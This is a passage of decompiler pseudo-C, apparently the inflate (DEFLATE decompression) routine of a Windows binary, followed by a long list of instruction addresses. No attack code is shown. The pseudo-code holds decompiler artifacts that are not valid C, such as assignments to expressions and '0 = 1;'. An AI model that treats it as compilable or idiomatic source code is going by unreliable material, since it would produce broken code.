												__eflags = __ebx;
											}
											L130:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e90;
												if( *0x432e90 != 0) {
													L22:
													_t412 =  *0x40a5e8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5ec; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431d0c; // 0x432610
													_t446[5] = _t414;
													_t415 =  *0x431d08; // 0x432e10
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431d10;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x432190;
													if(_t416 < 0x432190) {
														L15:
														__eflags = _t416 - 0x431f4c;
														_t438 = 8;
														if(_t416 > 0x431f4c) {
															__eflags = _t416 - 0x432110;
															if(_t416 >= 0x432110) {
																__eflags = _t416 - 0x432170;
																if(_t416 < 0x432170) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x431d10, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x431d10 + _t440;
														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
														 *0x432e90 =  *0x432e90 + 1;
														__eflags =  *0x432e90;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                                                      0x00406d85
                                                                                      0x00406d85
                                                                                      0x00406d85
                                                                                      0x00406d85
                                                                                      0x00406d85
                                                                                      0x00406d89
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d8f
                                                                                      0x00406d8f
                                                                                      0x00406d92
                                                                                      0x00406d95
                                                                                      0x00406d9a
                                                                                      0x00406d9c
                                                                                      0x00406d9f
                                                                                      0x00406da2
                                                                                      0x00406da5
                                                                                      0x00406da5
                                                                                      0x00406da8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406daa
                                                                                      0x00406daa
                                                                                      0x00406dad
                                                                                      0x00406db2
                                                                                      0x00406db4
                                                                                      0x00406db7
                                                                                      0x00406dbd
                                                                                      0x00406b1c
                                                                                      0x00406b1c
                                                                                      0x00406b1f
                                                                                      0x00406b25
                                                                                      0x00406b2b
                                                                                      0x00406b34
                                                                                      0x00406b3a
                                                                                      0x00406b3d
                                                                                      0x00406b44
                                                                                      0x00406b49
                                                                                      0x00406b4f
                                                                                      0x00406b5a
                                                                                      0x00406b5a
                                                                                      0x00406dc3
                                                                                      0x00406dc3
                                                                                      0x00406dcd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406dd3
                                                                                      0x00406dd3
                                                                                      0x00406dd7
                                                                                      0x00406dda
                                                                                      0x00406dda
                                                                                      0x00406dde
                                                                                      0x00406de4
                                                                                      0x00406de4
                                                                                      0x00406de7
                                                                                      0x00406dea
                                                                                      0x00406df0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406df2
                                                                                      0x00406e14
                                                                                      0x00406e14
                                                                                      0x00406e17
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406df4
                                                                                      0x00406df8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406dfe
                                                                                      0x00406dfe
                                                                                      0x00406e01
                                                                                      0x00406e04
                                                                                      0x00406e09
                                                                                      0x00406e0b
                                                                                      0x00406e0e
                                                                                      0x00406e11
                                                                                      0x00406e11
                                                                                      0x00406e19
                                                                                      0x00406e19
                                                                                      0x00406e1f
                                                                                      0x00406e22
                                                                                      0x00406e25
                                                                                      0x00406e25
                                                                                      0x00406e2c
                                                                                      0x00406e30
                                                                                      0x00406e34
                                                                                      0x00406e37
                                                                                      0x00406e3a
                                                                                      0x00406e40
                                                                                      0x00406e45
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e47
                                                                                      0x00406e5b
                                                                                      0x00406e5b
                                                                                      0x00406e5f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e49
                                                                                      0x00406e4c
                                                                                      0x00406e4c
                                                                                      0x00406e53
                                                                                      0x00406e58
                                                                                      0x00406e58
                                                                                      0x00406e58
                                                                                      0x00406e61
                                                                                      0x00406e61
                                                                                      0x00406e64
                                                                                      0x00406e72
                                                                                      0x00406e78
                                                                                      0x00406e7d
                                                                                      0x00406e83
                                                                                      0x00406e89
                                                                                      0x00406e8f
                                                                                      0x00406e96
                                                                                      0x00406eaa
                                                                                      0x00406eaa
                                                                                      0x00407479
                                                                                      0x00407479
                                                                                      0x00407479
                                                                                      0x0040747e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ab6
                                                                                      0x00406ab6
                                                                                      0x00000000
                                                                                      0x004070b1
                                                                                      0x004070b1
                                                                                      0x004070b5
                                                                                      0x004070b8
                                                                                      0x004070bb
                                                                                      0x004070be
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070c4
                                                                                      0x004070c4
                                                                                      0x004070e9
                                                                                      0x004070e9
                                                                                      0x004070e9
                                                                                      0x004070eb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070c9
                                                                                      0x004070c9
                                                                                      0x004070cd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070d3
                                                                                      0x004070d3
                                                                                      0x004070d6
                                                                                      0x004070d9
                                                                                      0x004070dc
                                                                                      0x004070de
                                                                                      0x004070e0
                                                                                      0x004070e3
                                                                                      0x004070e6
                                                                                      0x004070e6
                                                                                      0x004070e6
                                                                                      0x004070ed
                                                                                      0x004070ed
                                                                                      0x004070f5
                                                                                      0x004070f8
                                                                                      0x004070fb
                                                                                      0x004070fe
                                                                                      0x00407102
                                                                                      0x00407105
                                                                                      0x00407107
                                                                                      0x0040710a
                                                                                      0x0040710c
                                                                                      0x00407120
                                                                                      0x00407120
                                                                                      0x00407123
                                                                                      0x0040713d
                                                                                      0x0040713d
                                                                                      0x00407140
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407146
                                                                                      0x00407146
                                                                                      0x00407149
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040714f
                                                                                      0x0040714f
                                                                                      0x00000000
                                                                                      0x0040714f
                                                                                      0x00407125
                                                                                      0x00407128
                                                                                      0x0040712f
                                                                                      0x00407132
                                                                                      0x00000000
                                                                                      0x00407132
                                                                                      0x0040710e
                                                                                      0x00407112
                                                                                      0x00407115
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040715a
                                                                                      0x0040715a
                                                                                      0x0040717f
                                                                                      0x0040717f
                                                                                      0x0040717f
                                                                                      0x00407181
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040715f
                                                                                      0x0040715f
                                                                                      0x00407163
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407169
                                                                                      0x00407169
                                                                                      0x0040716c
                                                                                      0x0040716f
                                                                                      0x00407172
                                                                                      0x00407174
                                                                                      0x00407176
                                                                                      0x00407179
                                                                                      0x0040717c
                                                                                      0x0040717c
                                                                                      0x0040717c
                                                                                      0x00407183
                                                                                      0x0040718b
                                                                                      0x0040718e
                                                                                      0x00407191
                                                                                      0x00407193
                                                                                      0x00407196
                                                                                      0x00407196
                                                                                      0x00407198
                                                                                      0x0040719c
                                                                                      0x0040719f
                                                                                      0x004071a2
                                                                                      0x004071a5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004071ab
                                                                                      0x004071ab
                                                                                      0x004071d0
                                                                                      0x004071d0
                                                                                      0x004071d0
                                                                                      0x004071d2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004071b0
                                                                                      0x004071b0
                                                                                      0x004071b4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004071ba
                                                                                      0x004071ba
                                                                                      0x004071bd
                                                                                      0x004071c0
                                                                                      0x004071c3
                                                                                      0x004071c5
                                                                                      0x004071c7
                                                                                      0x004071ca
                                                                                      0x004071cd
                                                                                      0x004071cd
                                                                                      0x004071cd
                                                                                      0x004071d4
                                                                                      0x004071d4
                                                                                      0x004071dc
                                                                                      0x004071df
                                                                                      0x004071e2
                                                                                      0x004071e5
                                                                                      0x004071e9
                                                                                      0x004071ec
                                                                                      0x004071ee
                                                                                      0x004071f1
                                                                                      0x004071f4
                                                                                      0x0040720e
                                                                                      0x0040720e
                                                                                      0x00407211
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407217
                                                                                      0x00407217
                                                                                      0x0040721a
                                                                                      0x00407221
                                                                                      0x00000000
                                                                                      0x00407221
                                                                                      0x004071f6
                                                                                      0x004071f9
                                                                                      0x00407200
                                                                                      0x00407203
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407229
                                                                                      0x00407229
                                                                                      0x0040724e
                                                                                      0x0040724e
                                                                                      0x0040724e
                                                                                      0x00407250
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040722e
                                                                                      0x0040722e
                                                                                      0x00407232
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407238
                                                                                      0x00407238
                                                                                      0x0040723b
                                                                                      0x0040723e
                                                                                      0x00407241
                                                                                      0x00407243
                                                                                      0x00407245
                                                                                      0x00407248
                                                                                      0x0040724b
                                                                                      0x0040724b
                                                                                      0x0040724b
                                                                                      0x00407252
                                                                                      0x0040725a
                                                                                      0x0040725d
                                                                                      0x00407260
                                                                                      0x00407262
                                                                                      0x00407265
                                                                                      0x00407265
                                                                                      0x00407267
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040726d
                                                                                      0x0040726d
                                                                                      0x00407270
                                                                                      0x00407275
                                                                                      0x00407277
                                                                                      0x0040727d
                                                                                      0x0040727f
                                                                                      0x00407294
                                                                                      0x00407296
                                                                                      0x00407296
                                                                                      0x00407281
                                                                                      0x00407287
                                                                                      0x00407289
                                                                                      0x0040728b
                                                                                      0x0040728b
                                                                                      0x00407298
                                                                                      0x0040729c
                                                                                      0x0040729f
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a8
                                                                                      0x004072a8
                                                                                      0x004072a8
                                                                                      0x004072aa
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004072b0
                                                                                      0x004072b0
                                                                                      0x004072b6
                                                                                      0x004072b8
                                                                                      0x004072dd
                                                                                      0x004072e0
                                                                                      0x004072e6
                                                                                      0x004072eb
                                                                                      0x004072f1
                                                                                      0x004072f7
                                                                                      0x004072f9
                                                                                      0x004072fc
                                                                                      0x00407305
                                                                                      0x0040730b
                                                                                      0x0040730b
                                                                                      0x004072fe
                                                                                      0x00407300
                                                                                      0x00407302
                                                                                      0x00407302
                                                                                      0x0040730d
                                                                                      0x00407313
                                                                                      0x00407315
                                                                                      0x00407318
                                                                                      0x0040731a
                                                                                      0x00407320
                                                                                      0x00407322
                                                                                      0x00407324
                                                                                      0x00407326
                                                                                      0x00407328
                                                                                      0x0040732b
                                                                                      0x00407334
                                                                                      0x00407337
